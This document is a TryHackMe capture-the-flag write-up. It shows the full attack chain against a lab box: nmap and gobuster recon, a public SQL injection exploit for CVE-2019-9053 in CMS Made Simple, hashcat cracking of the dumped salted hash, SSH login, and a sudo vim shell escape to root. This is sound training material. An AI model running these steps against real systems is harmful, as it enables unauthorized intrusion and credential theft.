# TryHackMe - EasyCTF Writeup https://tryhackme.com/room/easyctf - [x] Recon - [x] Exploit - [x] Access - [x] Priv Esc ## Recon `nmap -sV 10.10.122.103` - I didn't log output, but it shows the following details: `ftp` at port `21` `http (apache)` at port `80` `ssh` at port `2222` `gobuster`with `rockyou.txt`, shows `simple` being open, which links to `cms made simple` site ## Exploit From searching, we found that `cms made simple` had this CVE: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-9053 This is a time-based blind SQLi of https://www.cmsmadesimple.org/ , which someone had made the exploit script here: https://github.com/4nner/CVE-2019-9053/blob/master/exploit.py `python exploit.py -u http://10.10.122.103/simple` ``` [+] Salt for password found: 1dac0d92e9fa6bb2 [+] Username found: mitch [+] Email found: admin@admin.com [+] Password found: 0c01f4468bd75d7a84c7eb73846e8d96 ``` pass+salt = `0c01f4468bd75d7a84c7eb73846e8d96:1dac0d92e9fa6bb2` To crack this I ran hashcat using md5 (had to try both `$salt.$pass` and `$pass.$salt` to get it cracked) with `rockyou.txt`as the wordlist ```bash .\hashcat.exe -m 20 '0c01f4468bd75d7a84c7eb73846e8d96:1dac0d92e9fa6bb2' .\wordlist\rockyou.txt ``` which shows: ``` bash 0c01f4468bd75d7a84c7eb73846e8d96:1dac0d92e9fa6bb2:secret Session..........: hashcat Status...........: Cracked Hash.Mode........: 20 (md5($salt.$pass)) Hash.Target......: 0c01f4468bd75d7a84c7eb73846e8d96:1dac0d92e9fa6bb2 Time.Started.....: Fri Oct 21 01:50:55 2022 (0 secs) Time.Estimated...: Fri Oct 21 01:50:55 2022 (0 secs) Kernel.Feature...: Pure Kernel Guess.Base.......: File (.\wordlist\rockyou.txt) ``` Password: `secret` ## Access `ssh` user + address: `mitch@10.10.122.103` port: `2222` pass: `secret` ## PrivEsc Seems like `bash` is disallowed to be run as root, but using `ls -al` we see a vim config/history file - which is able to be run as sudo. So the privesc command is `vim -c ':!/bin/sh'` and voila we got root! funfun!